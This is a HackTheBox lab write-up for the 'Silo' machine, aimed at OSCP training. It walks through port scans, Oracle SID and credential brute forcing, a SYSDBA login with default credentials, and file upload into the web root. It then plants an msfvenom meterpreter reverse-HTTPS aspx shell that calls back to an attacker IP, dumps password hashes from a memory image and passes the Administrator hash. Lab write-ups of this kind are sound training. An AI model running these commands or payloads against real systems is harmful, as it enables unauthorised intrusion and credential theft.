HacktheBox - Silo Writeup

10/01/2020

Zero to OSCP Hero Writeup #18 - Silo  

Reconnaissance

1. Nmap Scan - Common Ports TCP Scan

Let's start with a TCP scan of the target ip address to determine which common ports are open and which services are running on those ports:

nmap -sC -sV -oA nmap/initial.tcp 10.10.10.82

  • -sC: Run the default nmap script scan to find potential vulnerabilities
  • -sV: Detect the service version
  • -oA: Output the result of the scan in all formats as nmap/initial.tcp

From the scan we can see that there is port 80, 135,139,445 and most notably, port 1521 which is the default port Oracle databases listen on. 

2. Nmap Scan - All TCP Ports Scan

Okay, lets scan the entire TCP port range to confirm that there are no other ports open:

nmap -sC -sV -p- -oA nmap/full.tcp 10.10.10.82

  • -sC: Run the default nmap script scan to find potential vulnerabilities
  • -sV: Detect the service version
  • -p-: Run the nmap scan against all ports
  • -oA: Output the result of the scan in all formats as nmap/full.tcp

The full TCP scan confirmed that there is one additional port open, port 5985. 

3. Nmap Scan - All UDP Ports Scan

We can do the same full port scan, but with the UDP ports:

nmap -sU -p- -oA nmap/full.udp 10.10.10.82

  • -sU: Run the scan against UDP ports
  • -p-: Run the nmap scan against all ports
  • -oA: Output the result of the scan in all formats as nmap/full.tcp

The full UDP scan confirmed that there are a few ports which are open|filtered. 

Enumeration - Port 80

1. Browse to 10.10.10.82

So all we are presented with is the default IIS 8.5 page, nothing exciting here! 

2. Gobuster of 10.10.10.82

Lets see if there arer any hidden files or directories: 

gobuster dir -u 10.10.10.82 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x txt,asp,aspx,php

Unfortunatly, gobuster doesnt find anything. This indicates that port 1521 is the most likely route to exploiting this box. 

Enumeration - Port 1521

Port 1521 is the default port that oracle databases listen on, so lets see what information we can gather! 

1. Talk to the TNS-Listener

The first step to enumerate oracle is to talk to the TNS-Listener which by default is listening on TCP port 1521. We will us the tool tnscmd10g which can give us some useful information about the oracle database. 

./tnscmd10g status -h 10.10.10.82

As you can see, we are getting errors as the database is most likely password protected. 

2. Oracle Database Attacking Tool - ODAT

Lets see if we can get any further by using a tool called ODAT. ODAT is an open source penetration testing tool that tests the security of Oracle Databases remotely

2.1 Installation of ODAT

ODAT is not plug and play out of the box, there are some steps needed to install it properly, I found this guide extremely helpful

2.2 SID Brute Force 

An Oracle SID is used to uniquely identify a particular oracle database on the machine. 

We can use ODAT and its sidguesser.py script to potentially find the oracle databases on the machine: 

./odat.py sidguesser -s 10.10.10.82

So sidguesser has found some valid SIDs! 

2.3 Credential Brute Force 

Now that we have a list of valid SID's, we now need to find credentials that are able to access the databases. This is where we will use the metasploit module, oracle_login to try and bruteforce the database creds: 

use auxiliary/admin/oracle/oracle_login

set rhosts 10.10.10.82

set SID XE

run -j

So we have brute forced credentials to the XE database! :D 

We would also have found the creds if we looked at default oracle account creds:

2.4 Connect to the XE Oracle database

Now that we know the oracle database and credentials, we can finally login to the database and manually enumerate the contents: 

sqlplus scott/tiger@10.10.10.82:1521/XE

We can also try and login as SYSDBA which is usually for fully empowered database administrators! 

sqlplus scott/tiger@10.10.10.82:1521/XE as sysdba

and it worked! We are now running with sysdba privs. 

2.5 Check Oracle Version

select * from v$Version;

2.6 Check Database User Permissions

select * from user_role_privs;

As you can see as we are running as sysdba, we have alot of privileges!

2.7 Running ODAT file upload module

We can run ODAT once again, this time lets see if we can upload files with the module utlfile. 

Firstly lets create a file to test the file upload capability: 

echo "this is a test" > test.txt 

./odat.pydbmsxslprocessor -s 10.10.10.82 -d XE -U SCOTT -P tiger --putFile 'C:\inetpub\wwwroot\' 'uploaded.txt' /opt/odat/test.txt --sysdba 

Now lets see if we can access the file we created on the machines web server: 

curl https://10.10.10.82/uploaded.txt

Yes! we have confirmed that we are able to upload and execute files on the machines web server via the oracle database.

Initial Foothold - User

1. Upload a shell 

Lets create a reverse https shell with msfvenom: 

msfvenom -p windows/x64/meterpreter/reverse_https LHOST=10.10.14.59 LPORT=9001 -f aspx > shell.aspx

1.1 Upload the aspx payload

We can use the same method as before with the test file to upload to the web server:

./odat.py dbmsxslprocessor -s 10.10.10.82 -d XE -U SCOTT -P tiger --putFile 'C:\inetpub\wwwroot\' 'shell.aspx' /root/Desktop/htb/boxes/silo/shell.aspx --sysdba

2. Start /multi/handler 

Lets start a /multi/handler ready for the connection from the machine: 

use exploit/multi/handler

set payload windows/x64/meterpreter/reverse_https 

set LHOST 10.10.14.59

set LPORT 9001

3. Execute the shell

Now we can browse to our created aspx payload:

https://10.10.10.82/shell.aspx

...And we have a meterpreter session! 

4. Grab the user.txt flag 

The flag is located in the home directory of the user Phineas

Privilege Escalation - Admin

1. Oracle Issue.txt 

Along with the user.txt file in Phineas' desktop folder, there is a txt file called 'oracle issue.txt' 

As you can see, we are given a link to a memory dump on dropbox, with the password needed to grab the memory dump. (the first encoded char is the £ symbol)

1.1 Download dump from dropbox

Click on the dropbox link given in the file, and use the password provided to gain access. We see that there is a .zip file and if you click into it, we see the .dmp file. 

Download the .zip file to our machine and use the unzip command on the folder: 

unzip SILO-20180105-221806.zip

2. Analyzing the dump with Volatility

Volatility is used for the extraction of digital artifacts from volatile memory (RAM) samples, meaning we can use the tool to find some information to help us to root!  

2.1 Inspect the processes

Volatility can be used for a wide range of analysis, including a list of the running processes at the time of the dump creation: 

volatility -f SILO-20180105-221806.dmp --profile=Win2012R2x64 pslist

From the running processes, we can see one called Dumpit.exe. Dumpit is a forensics tool used to create memory dumps, which is what looks to have been used for the machine. It may even have been run by admin so lets again use volatilitys tricks and aquire the hashes of the users on the machine! 

2.2 Find the user hashes - hivelist

In order to find the user hashes on the machine, we need to get a few more bits of information, starting with the hivelist, this will give us the memory addresses of SYSTEM and SAM. 

The hive list will give us the starting location in memory of where the registry information resides:

volatility -f SILO-20180105-221806.dmp --profile=Win2012R2x64 hivelist

We only need to take note of the first column for SYSTEM and SAM. 

SYSTEM= 0xffffc00000028000

SAM= 0xffffc00000619000

2.3 Output hashes to a file

We can now use volatility to create a hash text file with the registry information found: 

volatility -f SILO-20180105-221806.dmp --profile=Win2012R2x64 -y 0xffffc00000028000 -s 0xffffc00000619000 hashdump > hashes.txt

cat hashes.txt 

3. Pass the Hash with pth-winexe

We can now use a tool called pth-winexe to gain access to the machine with the administrators hash. 

We first need to edit the hash by removing the ':500:' and replacing it with a '%' 

pth-winexe -U "Administrator%aad3b435b51404eeaad3b435b51404ee:9e730375b7cbcebf74ae46481e07b0c7:::" //10.10.10.82 cmd

4. Grab the root.txt file 

Conclusion

I've not had much experience with Oracle DB exploitation or the use of Volatility before the machine, it was a learniong curve but one that will help me in both HTB and in real engagements. Nice box! 

Thanks for reading, Next up is Box #19 - Solidstate!